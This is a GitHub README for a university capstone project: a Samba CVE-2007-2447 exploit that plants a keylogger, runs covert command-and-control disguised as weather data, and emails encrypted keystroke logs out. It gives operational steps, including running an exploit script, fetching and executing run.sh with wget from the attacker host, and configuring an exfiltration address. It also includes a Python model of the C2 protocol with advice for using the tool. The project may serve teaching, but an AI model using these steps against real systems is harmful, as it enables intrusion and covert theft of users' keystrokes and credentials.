ygbull/Capstone

Capstone

Description

A cyber effect that exploits CVE-2007-2447, a command-injection flaw in Samba's "username map script" handling that allows remote code execution. A weaponized exploit delivers the implant to the victim machine, where it captures keystrokes. Command and control traffic is disguised as weather data that the implant requests over HTTP, and the captured keystroke log is AES-encrypted and sent out by the implant over SMTPS.

Exploit Scripts

Python Scripts

Binary

Requirements

Email

An email address (preferably a throwaway one) that the keylogger can send the encrypted keystroke log to from the victim machine.

Virtual Machines

Attacker

  • A Linux machine with Python installed (Kali Linux is recommended); it runs the exploit scripts and serves the implant files over HTTP
  • A second machine with Python 3 installed to run the server script (the command-and-control server); the victim must be able to reach its IP address

Victim

  • A machine running a Samba build affected by CVE-2007-2447 (Samba 3.0.0 through 3.0.25rc3 with a "username map script" configured), reachable from the attacker machines

How To Run

  1. Power on all three machines (both attacker machines and the victim). You do not need to log into the victim, but you do need to log into both the Kali Linux machine and the Server.

  2. On the Server, start the server script and note the public IP address it is listening on. The window running this script is where the commands that control the implant are entered.

    python3 server.py
  3. On the Kali Linux machine, copy the bash scripts and the binary into a single folder:

    > ls # should see only four files
    exploit.sh rewriteBoot.sh run.sh weather
  4. Start the attack:

    chmod +x exploit.sh # give executable permission
    ./exploit.sh <Target IP> <Kali-Linux IP> # run exploit script

    Give it a few seconds; if no shell prompt appears after running the command, run it again.

  5. In the netcat shell that the exploit returns, fetch and launch the implant:

    wget http://<Kali-Linux IP>:8564/run.sh
    chmod +x run.sh
    ./run.sh <Kali-Linux IP> <Email Address> <Server IP>

    After a few seconds, tear down the attacker-side processes: press CTRL+C twice, once for the netcat listener and once for the HTTP server that served run.sh on port 8564. The implant keeps running on the victim.

Usage

The implant is now running on the victim and its behaviour is controlled from the Server. By default, the Server answers the implant's requests with weather data reporting a temperature of 50°F, which instructs the keylogger to collect keystrokes. To change the value, type a number in the window where the server script is running and press Enter; the implant acts on the band the number falls into:

  • input ≤ 0°F encrypts the key log data and sends it in an email to the provided email address.
  • 0°F < input ≤ 32°F pauses the keylogger.
  • 32°F < input ≤ 70°F resumes the keylogger.
  • input > 70°F stops the keylogger and removes the implant and all files related to it on the victim machine.
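To make the control channel concrete, here is a small Python model of it. This is an added illustration, not code from the ygbull/Capstone repository: the server wraps the operator's number in a weather-looking JSON body (the field names are assumed; the project's real response format is not documented here), and the implant side maps the temperature to the four actions listed above and tracks its own collecting/paused/removed state. The keystrokes and operator inputs in the simulation are constructed sample data.

```python
import json

# Control value the README says the server sends by default (50°F = collect).
DEFAULT_TEMP_F = 50.0


def command_for_temp(temp_f):
    """Map a Fahrenheit temperature to an implant action using the README's four bands.
    Each upper boundary is inclusive: 0 -> EXFIL, 32 -> PAUSE, 70 -> RESUME."""
    if temp_f <= 0:
        return "EXFIL"          # encrypt the keystroke log and email it out
    if temp_f <= 32:
        return "PAUSE"          # stop collecting keystrokes
    if temp_f <= 70:
        return "RESUME"         # collect keystrokes
    return "SELF_DESTRUCT"      # stop and remove the implant and its files


def parse_operator_input(line, current=DEFAULT_TEMP_F):
    """Server side: the operator types a number and presses Enter.
    Anything that is not a number leaves the current control value unchanged."""
    try:
        return float(line.strip())
    except ValueError:
        return current


def build_weather_reply(temp_f, city="Springfield"):
    """Server side: hide the control value inside a weather-style JSON body.
    The field names here are an assumption for this example, not the project's format."""
    return json.dumps({"location": city, "units": "F",
                       "temperature": temp_f, "conditions": "clear"})


class Implant:
    """Implant side: a state machine driven by the temperature in each reply."""

    def __init__(self):
        self.collecting = True   # the 50°F default means collect
        self.buffer = []         # keystrokes captured since the last exfil
        self.removed = False
        self.sent = []           # batches that would have gone out over SMTPS

    def keystroke(self, ch):
        if self.collecting and not self.removed:
            self.buffer.append(ch)

    def handle_reply(self, body):
        """Parse one weather reply and apply the command; returns the action taken."""
        if self.removed:
            return None          # a removed implant never beacons again
        action = command_for_temp(float(json.loads(body)["temperature"]))
        if action == "EXFIL":
            self.sent.append("".join(self.buffer))  # the real implant AES-encrypts this first
            self.buffer = []
        elif action == "PAUSE":
            self.collecting = False
        elif action == "RESUME":
            self.collecting = True
        else:                    # SELF_DESTRUCT: anything still buffered is lost
            self.collecting = False
            self.buffer = []
            self.removed = True
        return action


def simulate(operator_lines, typed):
    """One beacon per operator line; typed[i] holds the keystrokes seen before beacon i.
    Returns (action per beacon, batches exfiltrated)."""
    implant = Implant()
    actions = []
    temp = DEFAULT_TEMP_F
    for line, keys in zip(operator_lines, typed):
        for ch in keys:
            implant.keystroke(ch)
        temp = parse_operator_input(line, temp)   # the server keeps the last value
        actions.append(implant.handle_reply(build_weather_reply(temp)))
    return actions, implant.sent


if __name__ == "__main__":
    # Constructed session: collect, pause, exfil, resume, then self-destruct.
    acts, batches = simulate(["", "20", "abc", "", "0", "45", "x", "99", "1"],
                             ["hel", "lo", "wor", "ld", "", "", "tail", "", "z"])
    print(acts, batches)
```

The simulation shows two operational details worth knowing before using the real tool: an invalid or empty operator input keeps the previous control value, so the implant keeps doing whatever it was last told, and a self-destruct (> 70°F) discards any keystrokes that were buffered but never exfiltrated with a ≤ 0°F command.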

The message delivered to the email address is AES-encrypted. To decrypt it and read the keystroke log, paste the message contents into a file named keylog.txt in the same directory as decrypt_email.py and run the script:

python3 decrypt_email.py

The script replaces the contents of keylog.txt with the decrypted keystroke log.

About

564 capstone project
